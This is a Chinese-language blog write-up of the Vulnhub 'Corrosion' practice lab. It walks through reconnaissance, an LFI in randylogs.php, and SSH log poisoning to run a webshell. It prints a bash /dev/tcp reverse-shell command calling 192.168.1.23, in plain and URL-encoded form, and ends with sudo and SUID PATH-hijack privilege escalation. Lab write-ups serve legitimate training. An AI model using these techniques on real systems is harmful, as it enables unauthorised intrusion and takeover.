freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Vulnhub靶场之Corrosion
cordium 2021-08-14 17:43:35 148839

一、环境搭建

靶场下载地址:http://www.vulnhub.com/entry/corrosion-1,730/,使用vm打开,配置kali和靶场处于同一个网络。

二、信息收集

主机发现

1628933645_61178e0dc7795467195fd.png!small?1628933647511

主机扫描

1628933653_61178e15c980ae44fa398.png!small?1628933655313

1628933656_61178e18991d15188bc3c.png!small?1628933658182

目录扫描

1628933670_61178e26114bf20ecc336.png!small?1628933671591

1628933707_61178e4bbe06221c7e1ed.png!small?1628933709268

1628933713_61178e51b90771cfb5863.png!small?1628933715236

1628933719_61178e57c3475d505da17.png!small?1628933721259

猜测需要更改ssh日志/var/log/auth.log文件,该文件中记录ssh登录失败的用户名,可以使用一句话木马来登录ssh,然后使用文件包含漏洞来包含该文件,达到执行一句话木马的目的。

1628933724_61178e5c74bcff6884609.png!small?1628933725918

1628933730_61178e6232da1cc5fdd29.png!small?1628933731693

FUZZ参数

1628933740_61178e6c0358df2435ddf.png!small?1628933741657

文件包含漏洞

1628933754_61178e7a6270fa2ca1255.png!small?1628933756089

三、漏洞利用

SSH日志投毒

SSH登录失败的用户名密码会保存在ssh日志/var/log/auth.log文件中,可以使用一句话木马来登录ssh,然后利用randylogs.php中的LFI漏洞来包含/var/log/auth.log达到执行一句话木马的目的。

1628933902_61178f0e12a2156f3ad7b.png!small?1628933903624

1628933906_61178f1289ad515b1c187.png!small?1628933908149

1628933911_61178f177595569a78309.png!small?1628933913023

1628933917_61178f1d51e97953ae1f5.png!small?1628933918912

反弹SHELL

bash -c 'bash -i >& /dev/tcp/192.168.1.23/1234 0>&1'
url编码
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.23%2F1234%200%3E%261%27

1628933965_61178f4debe8946030481.png!small?1628933967422

1628933970_61178f5204c2e55593597.png!small?1628933971476

1628933973_61178f55c1097dffceee9.png!small?1628933975305

四、内网信息收集

1628933990_61178f66e70f8b53027f3.png!small?1628933992464

1628933994_61178f6adbc83e9f20a9f.png!small?1628933996332

1628933997_61178f6dd2f38d82a5533.png!small?1628933999313

1628934001_61178f710eb9df7250877.png!small?1628934002513

1628934006_61178f76d78b4b327796c.png!small?1628934008363

1628934012_61178f7c081ba97b7ca4a.png!small?1628934013545

1628934014_61178f7e86af0bef80592.png!small?1628934016045

1628934018_61178f821d4f6250c1607.png!small?1628934019629

1628934021_61178f85cbad2704e842c.png!small?1628934023279

1628934025_61178f89a35b9cef07c4c.png!small?1628934027208

1628934029_61178f8d8b20b8ef60263.png!small?1628934031075

1628934034_61178f9211e42f8cf00da.png!small?1628934035555

1628934037_61178f9552a969034bf22.png!small?1628934038876

五、提权

SUDO滥用

手动写一个用来提权的easysysinfo.c文件,然后编译到/home/randy/tools/easysysinfo中,利用sudo执行来提权。

1628934072_61178fb871080fb89db1b.png!small?1628934073976

1628934077_61178fbd0c72f5cda8e77.png!small?1628934078711

SUID滥用

Easysysinfo有suid位,可以用来提权,猜测easysysinfo是由压缩包中easysysinfo.c编译得来而来,查看源码得知cat未使用绝对路径,所以可以手动增添一个cat用来提权,修改环境变量$PATH使easysysinfo执行我们写的cat。

1628934098_61178fd21239d4176e9ab.png!small?1628934099538

1628934103_61178fd72a53d72e36657.png!small?1628934104692

1628934108_61178fdcf2cb9a0ea06bd.png!small?1628934110493

1628934114_61178fe212457739fc183.png!small?1628934115657


# 渗透测试 # 黑客 # web安全 # vulnhub靶机 # Corrosion
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 cordium 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
VulnHub靶场
cordium LV.4
这家伙太懒了,还未填写个人描述!
  • 20 文章数
  • 31 关注者
sqli-labs payloads and key code
2022-03-13
Illegal mix of collations for operation “UNION”
2021-09-13
Python黑帽子——黑客与渗透测试编程之道
2021-05-31
文章目录